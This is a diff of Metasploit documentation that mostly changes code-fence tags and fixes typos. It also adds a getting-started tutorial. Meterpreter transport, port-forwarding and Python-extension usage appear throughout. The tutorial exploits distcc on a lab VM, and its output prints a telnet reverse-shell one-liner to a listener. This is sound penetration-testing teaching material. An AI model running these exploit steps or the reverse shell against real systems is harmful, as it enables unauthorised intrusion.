+    -X <opt>  Expiration timeout (seconds) (default: same as current session)
    -c <opt>  SSL certificate path for https transport verification (optional)
    -h        Help menu
    -i <opt>  Specify transport by index (currently supported: remove)
@@ -65,7 +65,7 @@ OPTIONS:

 The simplest of all the sub-commands in the `transport` set is `list`. This command shows the full list of currently enabled transport, and an indicator of which one is the "current" transport. The following shows the non-verbose output with just the default transport running:

-```bash
+```msf
 meterpreter > transport list
 Session Expiry  : @ 2015-06-09 19:56:05

@@ -82,7 +82,7 @@ The above output shows that we have one transport enabled that is using `TCP`. W

 The verbose version of this command shows more detail about the transport, but only in cases where extra detail is available (such as `reverse_http/s`). The following command shows the output of the `list` sub-command with the verbose flag (`-v`) after an `HTTP` transport has been added:

-```bash
+```msf
 meterpreter > transport list -v
 Session Expiry  : @ 2015-06-09 19:56:05

@@ -98,7 +98,7 @@ Adding transports gives Meterpreter the ability to work on different transport m

 The following command shows a simple example that adds a `reverse_http` transport to an existing Meterpreter session. It specifies a custom communications timeout, retry total and retry wait, and also specifies a custom user-agent string to be used for the HTTP requests:

-```bash
+```msf
 meterpreter > transport add -t reverse_http -l 10.1.10.40 -p 5105 -T 50000 -W 2500 -C 100000 -A "Totes-Legit Browser/1.1"
 [*] Adding new transport ...
 [+] Successfully added reverse_http transport.
@@ -127,7 +127,7 @@ It is also possible to specify the following:

 The following shows another example which adds another `reverse_tcp` transport to the transport list:

-```bash
+```msf
 meterpreter > transport add -t reverse_tcp -l 10.1.10.40 -p 5005
 [*] Adding new transport ...
 [+] Successfully added reverse_tcp transport.
@@ -155,7 +155,7 @@ The three different ways to change transports are:

 As an example, here is the current transport setup:

-```bash
+```msf
 meterpreter > transport list
 Session Expiry  : @ 2015-06-09 19:56:05

@@ -168,7 +168,7 @@ Session Expiry  : @ 2015-06-09 19:56:05

 Moving to the next transport:

-```bash
+```msf
 meterpreter > transport next
 [*] Changing to next transport ...
 [+] Successfully changed to the next transport, killing current session.
@@ -195,7 +195,7 @@ This output shows that we moved from the original `reverse_tcp` to the `reverse_

 Moving to the next transport again takes the session to the second `reverse_tcp` listener:

-```bash
+```msf
 meterpreter > transport next
 [*] Changing to next transport ...
 [+] Successfully changed to the next transport, killing current session.
@@ -218,7 +218,7 @@ Session Expiry  : @ 2015-06-09 19:56:06

 From here, moving backward sends Meterpreter back to the `reverse_http` listener:

-```bash
+```msf
 meterpreter > transport prev
 [*] Changing to previous transport ...

@@ -252,7 +252,7 @@ The command is similar to `add` in that it takes a subset of the parameters, and
 * `-p` - The `LPORT` value.
 * `-u` - This value is only required for `reverse_http/s` transports and needs to contain the URI of the transport in question. This is important because there might be multiple listeners on the same IP and port, so the URI is what differentiates each of the sessions.

-```bash
+```msf
 [*] Starting interaction with 2...

 meterpreter > transport list
@@ -282,7 +282,7 @@ Previously, Meterpreter only had built-in resiliency in the `HTTP/S` payloads an

 The following shows Metasploit being closed and leaving the existing `TCP` session running behind the scenes:

-```bash
+```msf
 meterpreter > transport list
 Session Expiry  : @ 2015-06-09 19:56:05

@@ -301,7 +301,7 @@ With Metasploit closed, the Meterpreter session has detected that the transport

 The following output shows Metasploit being re-launched with the appropriate listeners, and the existing Meterpreter instance establishing a session automatically:

-```bash
+```msf
 ./msfconsole -r ~/msf.rc
 [*] Starting the Metasploit Framework console...|
 IIIIII    dTb.dTb        _.---._
@@ -63,7 +63,7 @@ Related open tickets (slightly broader than Meterpreter):

 * PrependTokenSteal / PrependEnvironmentSteal: Basically with proxies and other perimeter defenses being SYSTEM doesn't work well. This would be an addition to a payload that would work to execute as SYSTEM but would then locate a logged in user and steal their environment to call back to the handler. Very useful when pivoting around with PSEXEC
 * Binary installed death dates: A way putting a date in a binary where after that date the binary no longer functions would be useful and possibly even perform self-deletion. Time zones would be a tricky matter, but is something handled by many programmers already (probably just not in shellcode)
- * Allow Meterpreter sesssions to resolve L3 addresses (#4793)
+ * Allow Meterpreter sessions to resolve L3 addresses (#4793)
 * Track whether or not the current session has admin credentials (#4633)d
 * Support Metasploit-side zlib compression of sessions
 * Being able to use Meterpreter instances to easily forward commands & exfil
@@ -49,7 +49,7 @@ If you go to `metasploit-framework/documentation/modules`, you'll see that there

 For example:

-```
+```msf
 msf> use auxiliary/scanner/smb/smb_login
 msf (smb_login)> info

@@ -4,7 +4,7 @@ Installers are built nightly for macOS, Windows (64-bit) and Linux.  These insta

 The following script invocation will import the Rapid7 signing key and setup the package for supported Linux and macOS systems:

-```
+```sh
 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall
@@ -33,7 +33,7 @@ If you downloaded Metasploit from us, there is no cause for alarm.  We pride our
 ### Windows silent installation

 The PowerShell below will download and install the framework, and is suitable for automated Windows deployments. Note that, the installer will be downloaded to `$DownloadLocation` and won't be deleted after the script has run.
-```
+```powershell
 [CmdletBinding()]
 Param(
    $DownloadURL = "https://windows.metasploit.com/metasploitframework-latest.msi",
@@ -1,7 +1,7 @@
 # Install oracle InstantClient


-InstantClient 10 is recommneded to allow you to talk with 8,9,10,&11 server versions.
+InstantClient 10 is recommended to allow you to talk with 8,9,10,&11 server versions.

 Go to <https://www.oracle.com/database/technologies/instant-client/downloads.html> and select the link corresponding to your UNIX PC's architecture. Example for Linux x64, use the Instant Client for Linux x86-64 link, which should take you to <https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html>

@@ -95,7 +95,7 @@ IPv4 Active Routing Table
 msf6 post(multi/manage/autoroute) >
 ```

-All right so that's one way, but what if we wanted to do this manually? First off to flush all routes from the routing table, we will do `route flush` followed by `route` to double check we have successfully removed the entires.
+All right so that's one way, but what if we wanted to do this manually? First off to flush all routes from the routing table, we will do `route flush` followed by `route` to double check we have successfully removed the entries.

 ```msf
 msf6 post(multi/manage/autoroute) > route flush
@@ -290,7 +290,7 @@ Active sessions
 #### Local Port Forwarding
 To set up a port forward using Metasploit, use the `portfwd` command within a supported session's console such as the Meterpreter console. Using `portfwd -h` will bring up a help menu similar to the following:

-```
+```msf
 meterpreter > portfwd -h
 Usage: portfwd [-h] [add | delete | list | flush] [args]

@@ -309,7 +309,7 @@ meterpreter >

 To add a port forward, use `portfwd add` and specify the `-l`, `-p` and `-r` options at a minimum to specify the local port to listen on, the report port to connect to, and the target host to connect to respectively.

-```
+```msf
 meterpreter > portfwd add -l 1090 -p 443 -r 169.254.37.128
 [*] Local TCP relay created: :1090 <-> 169.254.37.128:443
 meterpreter >
@@ -338,7 +338,7 @@ Note that you may need to edit your `/etc/hosts` file to map IP addresses to giv
 #### Listing Port Forwards and Removing Entries
 Can list port forwards using the `portfwd list` command. To delete all port forwards use `portfwd flush`. Alternatively to selectively delete local port forwarding entries, use `portfwd delete -l <local port>`.

-```
+```msf
 meterpreter > portfwd delete -l 1090
 [*] Successfully stopped TCP relay on 0.0.0.0:1090
 meterpreter > portfwd list
@@ -355,7 +355,7 @@ To set up a reverse port forward, use `portfwd add -R` within a supported sessio

 For example to listen on port 9093 on a target session and have it forward all traffic to the Metasploit machine at 172.20.97.72 on port 9093 we could execute `portfwd add -R -l 4444 -L 172.20.97.73 -p 9093` as shown below, which would then cause the machine who have a session on to start listening on port 9093 for incoming connections.

-```
+```msf
 meterpreter > portfwd add -R -l 4444 -L 172.20.97.73 -p 9093
 [*] Local TCP relay created: 172.20.97.73:4444 <-> :9093
 meterpreter > netstat -a
@@ -446,7 +446,7 @@ socks5 127.0.0.1 1080

 The final final should look something like this:

-```
+```ini
 # proxychains.conf  VER 3.1
 #
 #        HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.
@@ -11,12 +11,12 @@ Unfortunately, at this point in time the extension only works inside x86 and x64
 # Usage

 As with any other extension that comes with Meterpreter, loading it is very simple:
-```
+```msf
 meterpreter > use python
 Loading extension python...success.
 ```
 Once loaded, the help system shows the commands that come with the extension:
-```
+```msf
 meterpreter > help

    ... snip ...
@@ -36,7 +36,7 @@ Each of these commands is discussed in detail below.
 ## python_execute

 The `python_execute` command is the simplest of all commands that come with the extension, and provides the means to run single-shot lines of Python code, much in the same way that the normal Python interpreter functions from the command-line when using the `-c` switch. The full help for the command is as follows:
-```
+```msf
 meterpreter > python_execute -h
 Usage: python_execute <python code> [-r result var name]

@@ -50,13 +50,13 @@ OPTIONS:
    -r <opt>  Name of the variable containing the result (optional)
 ```
 A very simple example of this command is shown below:
-```
+```msf
 meterpreter > python_execute "print 'Hi, from Meterpreter!'"
 [+] Content written to stdout:
 Hi, from Meterpreter!
 ```
 Notice that any output that is written to stdout is captured by Meterpreter and returned to Metasploit so that it's visible to the user. This also happens for anything written to stderr, as shown below:
-```
+```msf
 meterpreter > python_execute "x = x + 1"
 [-] Content written to stderr:
 Traceback (most recent call last):
@@ -66,25 +66,25 @@ NameError: name 'x' is not defined
 This handy feature now only allows users to see the output of their scripts, but it also means that any errors are completely visible too.

 A more interesting example can be seen below:
-```
+```msf
 meterpreter > python_execute "x = [y for y in range(0, 20) if y % 5 == 0]"
 [+] Command executed without returning a result
 ```
 The command above executes, but nothing was printed to stdout, or to stderr, and hence nothing was captured.

-The good thing is that the Python extension is persistant across calls. This means that after the above command is executed, `x` is still present in the interpreter and can be accessed with another call:
-```
+The good thing is that the Python extension is persistent across calls. This means that after the above command is executed, `x` is still present in the interpreter and can be accessed with another call:
+```msf
 meterpreter > python_execute "print x"
 [+] Content written to stdout:
 [0, 5, 10, 15]
 ```
-As useful as this is, developers may want to produce post-modules that make use of the data that a Python script has generated. Parsing stdout is not ideal in such a scenario, and hence this command provides the means for individual variables to be extracted directly using the `-r` paramter, as described by the help:
-```
+As useful as this is, developers may want to produce post-modules that make use of the data that a Python script has generated. Parsing stdout is not ideal in such a scenario, and hence this command provides the means for individual variables to be extracted directly using the `-r` parameter, as described by the help:
+```msf
 meterpreter > python_execute "x = [y for y in range(0, 20) if y % 5 == 0]" -r x
 [+] x = [0, 5, 10, 15]
 ```
 Note that this command requires the first parameter to be a string that contains code that needs to be executed. However, this string can be blank, resulting in no code being executed. This means that extraction of content generated in previous calls is still possible without executing more code, or rerunning previous code snippets just to make use of the `-r` parameter:
-```
+```msf
 meterpreter > python_execute "" -r x
 [+] x = [0, 5, 10, 15]
 ```
@@ -95,7 +95,7 @@ Sometimes, single-line execution isn't enough, or is cumbersome. The `python_imp
 ## python_import

 This command allows for whole modules to be loaded from the attacker's machine an uploaded to the target interpreter. The full help is shown below:
-```
+```msf
 meterpreter > python_import -h
 Usage: python_import <-f file path> [-n mod name] [-r result var name]

@@ -114,8 +114,8 @@ OPTIONS:
 Importing of module trees is still considered a _beta_ feature, but we encourage you to use it where possible and keep us informed of any issues you may face.

 Consider the following script:
-```
-$ cat /tmp/drives.py
+```python
+# $ cat /tmp/drives.py
 import string
 from ctypes import windll

@@ -133,7 +133,7 @@ result = get_drives()
 print result
 ```
 The aim of this is to determine all the local logical drives and put the letters into a list. From there it prints that list to screen. The result of running the script is as follows:
-```
+```msf
 meterpreter > python_import -f /tmp/drives.py
 [*] Importing /tmp/drives.py ...
 [+] Content written to stdout:
@@ -146,7 +146,7 @@ This command is also intended to allow for recursive loading of modules from the
 ## python_reset

 It may get to a point where the content of the interpreter needs to be flushed. The `python_reset` command clears out all imports, libraries and global variables:
-```
+```msf
 meterpreter > python_execute "x = 100"
 [+] Command executed without returning a result
 meterpreter > python_execute "print x"
@@ -244,7 +244,7 @@ It is not possible to delete transports using the python extension as this opens

 ### Bindings example

-```
+```msf
 meterpreter > getuid
 Server username: WIN-TV01I7GG7JK\oj
 meterpreter > python_execute "import meterpreter.user; print meterpreter.user.getuid()"
@@ -8,18 +8,18 @@ Clone a new metasploit-framework.git repository:

 Go there and check out every remote branch we've got. That way, if you screw up and delete something important, you can add it back in later from this backup clone.

-````
+```
 todb@presto:~/github/todb-r7$ cd msf-backup.git
 `todb@presto:~/github/todb-r7/metasploit-framework$ for b in `git branch -r | grep -v "HEAD -> origin" | sed 's/^  origin\///'`; do git checkout -b $b --track origin/$b; done
-````
+```

 Tarball it out of the way.

-````
+```
 todb@presto:~/github/todb-r7$ cd ..
 todb@presto:~/github$ tar zxvf msf-backup.git.tar.gz
 todb@presto:~/github$ rm -rf msf-backup.git
-````
+```

 # Make a new clone

@@ -35,10 +35,10 @@ First, wipe out anything that responds to prune. Usually that's not a lot.

 Next, take a look at what's already merged and what's not. We can drop most of the merged stuff right away.

-````
+```
 mazikeen:./msf-prune$ git branch -r --merged 
 mazikeen:./msf-prune$ git branch -r --no-merged 
-````
+```

 That gives a pretty good idea of how many branches we're talking about.

@@ -46,21 +46,21 @@ That gives a pretty good idea of how many branches we're talking about.

 Here's a one-liner, lightly modified from http://stackoverflow.com/questions/2514172/listing-each-branch-and-its-last-revisions-date-in-git#2514279 which lists all remote **merged** branches in date order.

-````
+```
 mazikeen:./msf-prune$ for k in `git branch -r --merged |grep -v "HEAD ->" | sed s/^..//`; do echo -e `git log -1 --pretty=format:"%Cgreen%ci %Cblue%cr%Creset" $k --`\\t"$k";done | sort
-````
+```

 Count off how many you want to keep at the end, do the arithmetic, and tack on another couple pipes to catch everything that's more than two weeks old. These are the merged branches that nobody's likely to miss.

-`````
+```
 mazikeen:./msf-prune$ for k in `git branch -r --merged |grep -v "HEAD ->" | sed s/^..//`; do echo -e `git log -1 --pretty=format:"%Cgreen%ci %Cblue%cr%Creset" $k --`\\t"$k";done | sort | head -45 | sed "s/^.*origin\///" > /tmp/merged_to_delete.txt
-````
+```

 Pull the trigger:

-````
+```
 mazikeen:./msf-prune$ for b in `cat /tmp/merged_to_delete.txt`; do echo Deleting $b && git push origin :$b; done
-````
+```

 Note that we still have our tarball, so if we need to reinstate any of these branches, just need to re-push.

@@ -31,14 +31,14 @@ You can inspect exactly what commits are contained in this merge with the follow

 Like so:

-````
+```
 $ git log bad-merge...bad-merge~ --oneline
 3996557 Fix conflcit lib/msf/util/exe.rb
 6296c4f Merge pull request #9 from tabassassin/retab/pr/2320
 d0a3ea6 Retab changes for PR #2320
 bff7d0e Merge for retab
 4c9e6a8 Default to exe-small
-````
+```

 The syntax is a little wacky, but this is saying, "Show me all the commit hashes that occur from the `bad-merge` point to one back from `bad-merge` (in other words, from right before `bad-merge` was merged). That's what the tilde (~) means. You could also use `bad-merge^` or `bad-merge^1`, they're all equivalent.

@@ -4,9 +4,9 @@ If you're in the business of writing or collecting Metasploit modules that aren'

 You must first set up a directory structure that fits with Metasploit's expectations of path names. What this typically means is that you should first create an "exploits" directory structure, like so:

-````bash
+```bash
 mkdir -p $HOME/.msf4/modules/exploits
-````
+```

 If you are using `auxiliary` or `post` modules, or are writing `payloads` you'll want to `mkdir` those as well.

@@ -14,9 +14,9 @@ If you are using `auxiliary` or `post` modules, or are writing `payloads` you'll

 Modules are sorted by (somewhat arbitrary) categories. These can be anything you like; I usually use `test` or `private`, but if you are developing a module with an eye toward providing it to the main Metasploit distribution, you will want to mirror the real module path. For example:

-````bash
+```bash
 mkdir -p $HOME/.msf4/modules/exploits/windows/fileformat
-````
+```

 ... if you are developing a file format exploit for Windows.

@@ -36,7 +36,7 @@ For full details:

 If you already have msfconsole running, use a `reload_all` command to pick up your new modules. If not, just start msfconsole and they'll be picked up automatically. If you'd like to test with something generic, I have a module posted up as a gist, here: <https://gist.github.com/todb-r7/5935519>, so let's give it a shot:

-````bash
+```bash
 mkdir -p $HOME/.msf4/modules/exploits/test
 curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/17f7e40ab9054051c1f7e0655c6f8c8a1787d4f5/test_module.rb
 todb@ubuntu:~$ mkdir -p $HOME/.msf4/modules/exploits/test
@@ -44,7 +44,7 @@ todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gis
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
 100  1140    0  1140    0     0   3607      0 --:--:-- --:--:-- --:--:--  7808
-````
+```

 Then, in my msfconsole window:

@@ -4,7 +4,7 @@ Recent changes to HTTP and HTTPS communications in both Meterpreter and its stag

 The Windows API comes with two ways to talk via HTTP/S, they are [WinInet][] and [WinHTTP][]. The APIs are consumed in a similar fashion; many of the functions in each have the same interface, or are at least close enough to make a transition between the two rather trivial. However, there are some underlying differences that are important.

-The [WinInet][] API was designed for use in desktop applications. It provides all the features required by applications to use HTTP/S while delegating much of the responsibilty of handling implementation detail to the underlying API and OS. This API can result in some user interface elements appearing if not handled correctly.
+The [WinInet][] API was designed for use in desktop applications. It provides all the features required by applications to use HTTP/S while delegating much of the responsibility of handling implementation detail to the underlying API and OS. This API can result in some user interface elements appearing if not handled correctly.

 [WinInet][] comes with some limitations, one of which is that it's close to impossible to do any kind of custom validation, parsing, or handling of SSL communications. One of the needs of Metasploit users is to be able to enable a [[Paranoid Mode|./meterpreter-paranoid-mode.md]] that forces Meterpreter to only talk with the appropriate endpoint. The goal is to prevent shells from being hijacked by unauthorised users. In order to do this, one of the things that was implemented was the verification of the SHA1 hash of the SSL certificate that Meterpreter reads from the server. If this hash doesn't match the one that Meterpreter is configured with, Meterpreter will shut down. [WinInet][] doesn't make this process possible without a _lot_ of custom work.

@@ -22,7 +22,7 @@ As indicated in a [blog post on MSDN][msdn_winhttp]:

 What this means is that from Windows 7 and onwards, the underlying [WinHTTP][] implementation requires proper HTTP/1.1 support from any proxies that are used. If a proxy uses HTTP/1.0, such as Squid 2.7, and requires `Keep-Alive` support, such as NTLM authentication, then [WinHTTP][] will refuse to talk to it. Instead of downgrading, it will expect a purely RFC-compliant implementation, and instead will return a `407` error the client. This means that for Meterpreter to work, [WinHTTP][] can't be used.

-In order to avoid this issue, [extra work][wininet_fallback] has beeen done to force Meterpreter to fall back to [WinInet][] when this happens. Given that [WinInet][] doesn't do certificate hash verification, this means that the user of Meterpreter loses the ability to use paranoid mode. It was decided that Meterpreter would not fallback to [WinInet][] if paranoid mode was enabled, as the intention of the user is clearly to avoid MITM.
+In order to avoid this issue, [extra work][wininet_fallback] has been done to force Meterpreter to fall back to [WinInet][] when this happens. Given that [WinInet][] doesn't do certificate hash verification, this means that the user of Meterpreter loses the ability to use paranoid mode. It was decided that Meterpreter would not fallback to [WinInet][] if paranoid mode was enabled, as the intention of the user is clearly to avoid MITM.

 To sum up, Meterpreter will use [WinHTTP][] where it can. If it can't, it'll fall back to [WinInet][] _unless_ paranoid mode is enabled.

@@ -27,7 +27,7 @@ If someone has library changes that cannot be merged to master, we cannot hang o

 ## Rescuing unstable modules

-If you'd like to rescue an unstable module, great! Just note that it's an unstable rescue in the pull request, and the original PR number (if you can find it), when you pull it back out. You can do a similiar `git checkout` to grab the file and then `git mv` it to the right spot again.
+If you'd like to rescue an unstable module, great! Just note that it's an unstable rescue in the pull request, and the original PR number (if you can find it), when you pull it back out. You can do a similar `git checkout` to grab the file and then `git mv` it to the right spot again.

 ## Safety

@@ -1,8 +1,259 @@
 ## Getting started

-Depending on your skill level - if you have no experience with Metasploit, the following resources may be a better starting point:
+Assuming you have installed Metasploit, either with the official Rapid7 nightly installers or through Kali, you can use the `msfconsole` command to open Metasploit:

-* <http://www.offensive-security.com/metasploit-unleashed/Main_Page>
-* <https://metasploit.help.rapid7.com/docs/>
-* <https://www.kali.org/docs/tools/starting-metasploit-framework-in-kali/>
-* <https://github.com/rapid7/metasploitable3>
+```msf
+ _                                                    _
+/ \    /\         __                         _   __  /_/ __
+| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
+| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
+|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
+      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\
+
+
+       =[ metasploit v6.3.35-dev-0fc88a8050               ]
+ -- --=[ 2357 exploits - 1227 auxiliary - 413 post       ]
+ -- --=[ 1387 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]
+
+Metasploit Documentation: https://docs.metasploit.com/
+
+msf6 >
+```
+
+### Finding modules
+
+Metasploit is based around the concept of [[modules]]. The most commonly used module types are:
+
+- Auxiliary - Auxiliary modules do not exploit a target, but can perform data gathering or administrative tasks
+- Exploit - Exploit modules leverage vulnerabilities in a manner that allows the framework to execute arbitrary code on the target host
+- Payloads - Arbitrary code that can be executed on a remote target to perform a task, such as creating users, opening shells, etc
+- Post - Post modules are used after a machine has been compromised. They perform useful tasks such as gathering, collecting, or enumerating data from a session.
+
+You can use the `search` command to search for modules:
+
+```msf
+msf6 > search type:auxiliary http html title tag
+
+Matching Modules
+================
+
+   #  Name                          Disclosure Date  Rank    Check  Description
+   -  ----                          ---------------  ----    -----  -----------
+   0  auxiliary/scanner/http/title                   normal  No     HTTP HTML Title Tag Content Grabber
+
+
+Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/title
+
+msf6 >
+```
+
+You can `use` a Metasploit module by specifying the full module name. The prompt will be updated to indicate the currently
+active module:
+
+```msf
+msf6 > use auxiliary/scanner/http/title
+msf6 auxiliary(scanner/http/title) > 
+```
+
+### Running Auxiliary modules
+
+Auxiliary modules do not exploit a target, but can perform data gathering or administrative tasks. For instance, a module
+extracting the HTTP title from a server:
+
+```msf
+msf6 > use auxiliary/scanner/http/title
+msf6 auxiliary(scanner/http/title) > 
+```
+
+Each module offers configurable options which can be viewed with the `show options`, or aliased `options`, command:
+
+```msf
+msf6 auxiliary(scanner/http/title) > show options
+
+Module options (auxiliary/scanner/http/title):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT        80               yes       The target port (TCP)
+   SHOW_TITLES  true             yes       Show the titles on the console as they are grabbed
+   SSL          false            no        Negotiate SSL/TLS for outgoing connections
+   STORE_NOTES  true             yes       Store the captured information in notes. Use "notes -t http.title" to view
+   TARGETURI    /                yes       The base path
+   THREADS      1                yes       The number of concurrent threads (max one per host)
+   VHOST                         no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(scanner/http/title) > 
+```
+
+To set a module option, use the `set command`. We will set the `RHOST` option - which represents the target host(s) that 
+the module will run against:
+
+```msf
+msf6 auxiliary(scanner/http/title) > set RHOSTS google.com
+RHOSTS => google.com
+```
+
+The `run` command will run the module against the target, showing the target's HTTP title:
+
+```msf
+msf6 auxiliary(scanner/http/title) > run
+
+[+] [142.250.180.14:80] [C:301] [R:http://www.google.com/] [S:gws] 301 Moved
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+New in Metasploit 6 there is added support for running modules with options set as part of the run command. For instance, setting
+both `RHOSTS` and enabling `HttpTrace` functionality:
+
+```msf
+msf6 auxiliary(scanner/http/title) > run rhosts=google.com httptrace=true 
+
+####################
+# Request:
+####################
+GET / HTTP/1.1
+Host: google.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
+
+
+####################
+# Response:
+####################
+HTTP/1.1 301 Moved Permanently
+Location: http://www.google.com/
+Content-Type: text/html; charset=UTF-8
+Server: gws
+Content-Length: 219
+
+<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
+<TITLE>301 Moved</TITLE></HEAD><BODY>
+<H1>301 Moved</H1>
+The document has moved
+<A HREF="http://www.google.com/">here</A>.
+</BODY></HTML>
+
+[+] [142.250.180.14:80] [C:301] [R:http://www.google.com/] [S:gws] 301 Moved
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/title) > 
+```
+
+### Running exploit modules
+
+Exploit modules require a vulnerable target. It is recommended to set up your own local test environment to run modules against.
+For instance in a Virtual Machine, or with Docker. There are multiple pre-built vulnerable test environments including:
+
+- [Metasploitable2](https://docs.rapid7.com/metasploit/metasploitable-2/) 
+- [Metasploitable3](https://github.com/rapid7/metasploitable3)
+
+For instance - targeting a vulnerable Metasploitable2 VM and using the `unix/misc/distcc_exec` module:
+
+```msf
+msf6 > use unix/misc/distcc_exec
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(unix/misc/distcc_exec) > 
+```
+
+Exploit modules will generally at a minimum require the following options to be set:
+
+- `RHOST` - The remote target host address 
+- `LHOST` - The listen address. **Important** This may need to be set to your `tun0` IP address or similar, if you are connecting to your target over a VPN
+- `PAYLOAD` - The code to be executed after an exploit is successful. For instance creating a user, or a Metasploit session. Often this can be left as the default value, but may sometimes require configuration
+
+Each module offers configurable options which can be viewed with the `show options`, or aliased `options`, command:
+
+```msf
+msf6 exploit(unix/misc/distcc_exec) > options
+
+Module options (exploit/unix/misc/distcc_exec):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT   3632             yes       The target port (TCP)
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic Target
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(unix/misc/distcc_exec) > 
+```
+
+For this scenario you can manually set each of the required option values (`RHOST`, `LHOST`, and optionally `PAYLOAD`):
+
+```msf
+msf6 exploit(unix/misc/distcc_exec) > set rhost 192.168.123.133
+rhost => 192.168.123.133
+msf6 exploit(unix/misc/distcc_exec) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
+payload => cmd/unix/reverse
+```
+
+The `run` command will run the module against the target, there is also an aliased `exploit` command which will perform the same action:
+
+```msf
+msf6 exploit(unix/misc/distcc_exec) > run
+
+[+] sh -c '(sleep 4375|telnet 192.168.123.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.123.1 4444 >/dev/null 2>&1 &)'
+[*] Started reverse TCP double handler on 192.168.123.1:4444 
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo BmpMGFX6NDVlh5h0;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "BmpMGFX6NDVlh5h0\r\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 2 opened (192.168.123.1:4444 -> 192.168.123.133:48578) at 2023-09-21 14:42:42 +0100
+
+whoami
+daemon
+```
+
+New in Metasploit 6 there is added support for running modules with options set as part of the run command:
+
+```msf
+msf6 exploit(unix/misc/distcc_exec) > run rhost=192.168.123.133 lhost=192.168.123.1 payload=cmd/unix/reverse
+
+[+] sh -c '(sleep 4305|telnet 192.168.123.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.123.1 4444 >/dev/null 2>&1 &)'
+[*] Started reverse TCP double handler on 192.168.123.1:4444
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo QqL1Uzom6eBFilyL;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "QqL1Uzom6eBFilyL\r\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.133:52314) at 2023-09-21 13:52:40 +0100
+
+whoami
+daemon
+```
@@ -176,7 +176,7 @@ git config commit.gpgsign true

 Developers tend to customize their own [git aliases] to speed up common commands, but here are a few common ones:

-```
+```ini
 [alias]
 # An easy, colored oneline log format that shows signed/unsigned status
 nicelog = log --pretty=format:'%Cred%h%Creset -%Creset %s %Cgreen(%cr) %C(bold blue)<%aE>%Creset [%G?]'
@@ -216,9 +216,9 @@ We're excited to see your upcoming contributions of new modules, documentation,

 Finally, we welcome your feedback on this guide, so feel free to reach out to us on [Slack] or open a [new issue].  For their significant contributions to this guide, we would like to thank [@kernelsmith], [@corelanc0d3r], and [@ffmike].

-[commercial-installer]:http://metasploit.com/download
+[commercial-installer]:https://metasploit.com/download
 [kali-user-instructions]:https://docs.kali.org/general-use/starting-metasploit-framework-in-kali
-[parrot-user-instructions]:https://parrotsec.org/docs/installation.html
+[parrot-user-instructions]:https://parrotsec.org/docs/category/installation
 [CONTRIBUTING.md]:https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md

 [Ubuntu]:https://www.ubuntu.com/download/desktop
@@ -14,7 +14,7 @@ The following sites are great references for Git padawans and jedi alike:
 * [Git is Easier Than You Think](http://nfarina.com/post/9868516270/git-is-simpler): A nice tutorial that breaks down one Git user's experience switching from Subversion.
 * [PeepCode: Git](http://peepcode.com/products/git): A one-hour (not-free) screencast covering Git basics. Well-made and easy to follow.
 * [GitHub Flow](http://scottchacon.com/2011/08/31/github-flow.html): Another great post from Scott Chacon describing a GitHub-based workflow for projects.
-* [Getting Started with GitHub](http://pragprog.com/screencasts/v-scgithub/insider-guide-to-github): Also from GitHub's own Scott Chacon, this two-part screencast (one free and one paid) will walk you through the basics of using GitHub.
+* [Getting Started with GitHub](https://pragprog.com/screencasts/v-scgithub/insider-guide-to-github): Also from GitHub's own Scott Chacon, this two-part screencast (one free and one paid) will walk you through the basics of using GitHub.


 ## Using Git in Editors
@@ -110,8 +110,8 @@ your day-to-day workflow with Git.
 ## Git in Bash
